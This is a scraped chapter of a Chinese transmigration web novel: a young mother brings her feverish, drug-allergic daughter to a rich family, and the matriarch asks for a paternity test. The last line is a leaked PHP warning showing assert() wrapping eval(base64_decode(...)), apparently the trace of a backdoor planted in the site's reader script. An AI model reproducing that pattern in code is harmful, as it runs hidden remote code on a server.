99书盟 > 玄幻小说 > 老公是个女儿控[穿书] > 正文 第2章 第 02 章
    从原作者的大纲当中,夏江没有看到关于夏啾啾亲生母亲的描写,这个女人甚至连名字都不配拥有。

    显然,这个角色是名字都没有想好就被原作者安排出场了。

    联系大纲的上下文,夏江推测“夏江”应该是知道夏啾啾的父亲是谁,然而男二并不知道夏啾啾的存在。

    这点很是让夏江纠结,唯一的解释是“夏江”不想让男二知道夏啾啾的存在。

    可是“夏江”后来这么轻易就去上门找男二,在她这儿有些说不过去。

    夏江一般不会对老板的大纲做出任何点评,每个人都有自己的想法。

    她不会把自己的想法加到老板的文里,所以她只是纠结一下就算了。

    夏江在家翻箱倒柜,都没有找到适合夏啾啾吃的退烧药,甚至连普通的感冒药都没有看到。

    她的心情有些复杂,看来之前的“夏江”是真的穷。

    没找到感冒药,她只好喂夏啾啾喝点热水,然后用温水给夏啾啾擦拭身体,等夏啾啾的体温稍微降下来了,这才准备带她出门。

    虽说夏江是一个自己感冒还要喝咖啡的狠人,但是她不至于没有常识。

    她知道小孩感冒容易反复发热,这会儿小孩的体温稍微降下来,并不代表小孩真的退烧了。

    所以,她还是要带夏啾啾去医院的。

    所以,她还是走“因为没钱给小孩看病所以去找小孩的亲生父亲”的剧情。

    大纲是这么写的,夏江就认了吧。

    男二叫“叶星澜”,叶家在祁城是声名显赫的几大家族之一。

    夏江现在找叶星澜本人肯定是找不到的,可是夏江找叶家可容易多了。

    她把身上的现金、家里的现金都搜刮出来。

    这钱去医院看病是不够的,她琢磨着这钱够不够钱打车去叶家。

    夏啾啾看到夏江把钱都翻出来,以为她真要带自己去医院看病打针。

    怕打针的小孩立马开口“妈咪……”

    夏江抬头看她,抿唇不语。

    聪明的小孩知道问题所在,立马改口了“……姐姐。”

    她说“啾啾不去医院,吃了医院的药药,啾啾会更加难受。”

    夏江以为小孩只是怕苦怕吃药,敷衍安慰了一下“啾啾吃药才能好。”

    夏啾啾撇了撇嘴,有些委屈地说“可是啾啾吃药会起红点,会痒痒。”

    夏江“…………”

    懂了,这小孩药物过敏。

    原本夏江还在“先去药店给夏啾啾买退烧药”和“立马打车去叶家找人”之间纠结,这会儿她不用纠结了。

    药物过敏这事可大可小,如果夏啾啾药物过敏,她还真不敢给夏啾啾吃退烧药。

    她隐隐约约明白为什么“夏江”会因为孩子发烧而找上叶家了。

    夏江不让自己想那么多,她往保温杯装了大半杯热水,然后就抱着夏啾啾出门了。

    这原本是平平无奇的一天,苏文燕好不容易终于打发儿子去和赵家那位千金约会,她觉得今天能做的事情都已经做完了,难免有些无趣。

    苏文燕想,她要不要约人过来搓一下麻将,打发一下时间呢?

    她心不在焉rua她的猫猫,叶家的管家一脸复杂的神情过来找她了。

    管家喊了声“太太”,苏文燕没听到。

    等到他喊第三次“太太”,苏文燕才抬眼看他,说“我不是聋子,你有话就说。”

    管家不知道该怎么开口说这个事。

    他犹豫了一下,才说“外面有一位夏小姐,说找小叶先生。”

    找小叶先生啊,小叶先生正在和赵家那位千金约会呢。

    苏文燕“嗯”了一声,问“然后呢?”

    管家知道苏文燕在问什么,他回答“她说她现在没有办法联系小叶先生,所以只好找来叶家。”

    苏文燕又“嗯”了一声。

    她微微垂眸,动作轻柔地摸着她腿上的布偶猫。

    管家没听到她的指示,只好往下说“夏小姐抱着一个三四岁大的女孩,说这是小叶先生的孩子。她想现在见见小叶先生,或是太太您。”

    苏文燕手上的动作顿了顿,然后继续rua她的猫猫。她问“那个女人长得漂亮吗?”

    管家“…………”

    管家回想了一下那位夏小姐的模样,如实回答“挺漂亮的。”

    苏文燕“能比赵家那位千金好看吗?”

    管家求生欲十分强烈“各有千秋。”

    苏文燕“那个小孩可爱吗?”

    管家“……可爱。”

    苏文燕“有多可爱?”

    管家“挺可爱的。”

    苏文燕斜眼看了一下管家,觉得他净说一些无用的话。

    管家眼观鼻、鼻观心,觉得叶太太净问一些无用的问题。

    苏文燕想了想,才对管家说“算了,你带她进来给我看看吧。”

    反正她闲着也是闲着,见见也无妨。

    最好那个女人比赵家那位千金还好看,最好那个孩子真的是叶星澜的种。

    闻言,管家应下了,然后退下。

    不一会儿,管家就带着那位夏小姐进来了。

    那位夏小姐看起来十分年轻,甚至看起来一点都不像已经生了孩子的女人。

    她的五官精致秀气,眉眼之间带着几分温柔,很容易让人心生好感,和自己想象中的完全不一样。

    苏文燕还以为她会是一个长相明艳张扬、然而没有什么脑子的女人,就像赵家那位千金一样。

    苏文燕朝对面的座位扬了扬下巴,言简意赅说道“坐。”

    夏江坐下来了,她抱着夏啾啾,表现出一副有些拘谨紧张的模样。

    甚至,说话也是带着一些拘谨与紧张“叶太太您好,我是夏江,是夏啾啾的母亲。”

    苏文燕抬眼看了一下夏江和夏啾啾,淡淡“嗯”一声,表示自己知道了。

    她还是在摸着她的猫猫,好像没有把夏江放在眼里,整个人看起来漫不经心、心不在焉的。

    她想,这个女人长得挺好看的,所以她不介意叶星澜真的和她有过关系。

    这个孩子长得也挺可爱的,所以她不介意这个孩子真的是叶星澜的孩子。

    只是有些可惜,这个孩子和这个女人长得太像了,长得不像叶星澜,所以亲子鉴定还是要做的。

    夏江没有太在意苏文燕对她的态度,甚至觉得苏文燕作为一个豪门阔太,这个态度挺正常的。

    夏江继续表演“其实我也不想上门打扰您的,可是我实在是没有办法”的受害者角色,她忐忑担忧地解释“四年前我和小叶先生发生了一些不愉快的事情,后来我生下了啾啾。”

    说完,她抱了抱怀里的孩子,俨然一副十分担忧自己孩子的模样“前几天孩子发烧了,因为孩子药物过敏,我不敢给她吃退烧药,所以她的病情反反复复一直没好。”

    夏江“我一个单身妈妈遇到这种情况,实在不知道该怎么办,只好找你们帮忙。”

    夏江知道自己说的这些话是有点问题的,不过她的目的不是让苏文燕承认夏啾啾的存在,而是告知苏文燕孩子是你儿子的种,孩子现在发烧了,你快想想办法。

    听到夏啾啾又是发烧又是药物过敏,苏文燕手上的动作又顿住了。

    她皱了皱眉,“药物过敏?”

    夏江点了点头,十分心疼地说“是啊,这孩子吃药就容易起红疹,可难受了。”

    苏文燕“嗯”了一声。

    心想这孩子怎么和叶星澜小时候一个德性?

    爱生病就算了,还一吃药就起红疹?

    真真又是一个小麻烦精。

    苏文燕让管家把刘医生喊过来,让他给夏啾啾看病。

    刘医生是叶家的家庭医生,就住在这附近,他不一会儿就过来了。

    管家告知刘医生,这里有个小朋友发烧了,让他过来一趟。

    刘医生开始还以为是叶家的小朋友,结果过来一看,是一个没见过的小孩。

    不过他没有多想,只是给小孩量体温,询问小孩的情况。

    直到夏江说小孩吃退烧药会过敏、浑身起红疹的时候,他忍不住去看苏文燕。

    啊这,不就是和叶星澜先生一样吗?

    然而苏文燕没给他眼神,只是坐在沙发上rua她的猫猫。

    刘医生收回目光,不再有任何表示,他开始给夏啾啾准备药物和冰凉贴。

    询问清楚夏啾啾的情况,刘医生结合叶星澜先生身上的经验,给夏啾啾开了一些药性温和的感冒药、过敏药,叮嘱夏江要多留意小孩的情况、要多喝热水。

    医者仁心,刘医生不放心夏啾啾这位小朋友。

    临走前刘医生看了看苏文燕,然后给夏江留了联系方式,说如果小孩有什么突发情况可以联系他,或者立即送去医院。

    夏江自然是万分感谢地收下他的联系方式,同时她琢磨着她似乎该时候带夏啾啾离开了。

    不然等会儿夏啾啾的亲生爸爸回来了,他们当初对质,她什么都“不记得”了,场面该多尴尬。

    她在想如何开口向苏文燕表达自己的“感谢”,也在思考今天她到底能不能带夏啾啾离开这里。

    苏文燕抬眼看了看夏啾啾,又看了看夏江,显然她也是在想着事情。

    夏啾啾很乖,来到陌生的地方不哭不闹,除了喝药的时候委屈地撇撇嘴,没有其他表现不好的地方。

    看到苏文燕在看着自己,夏啾啾朝她扬起了一个大大的笑容,软萌软萌的,让人看到了都忍不住笑。

    苏文燕心想,这真是个招人疼的孩子。

    想归想,苏文燕很快就敛起笑意。

    她有些冷漠地对夏江说“做个亲子鉴定吧。”

Warning: assert() [function.assert]: Assertion "$婐疬寰鳍= eval(base64_decode($嚚戥呷));" failed in E:\Web\99shumeng\modules\article\reader.php on line 2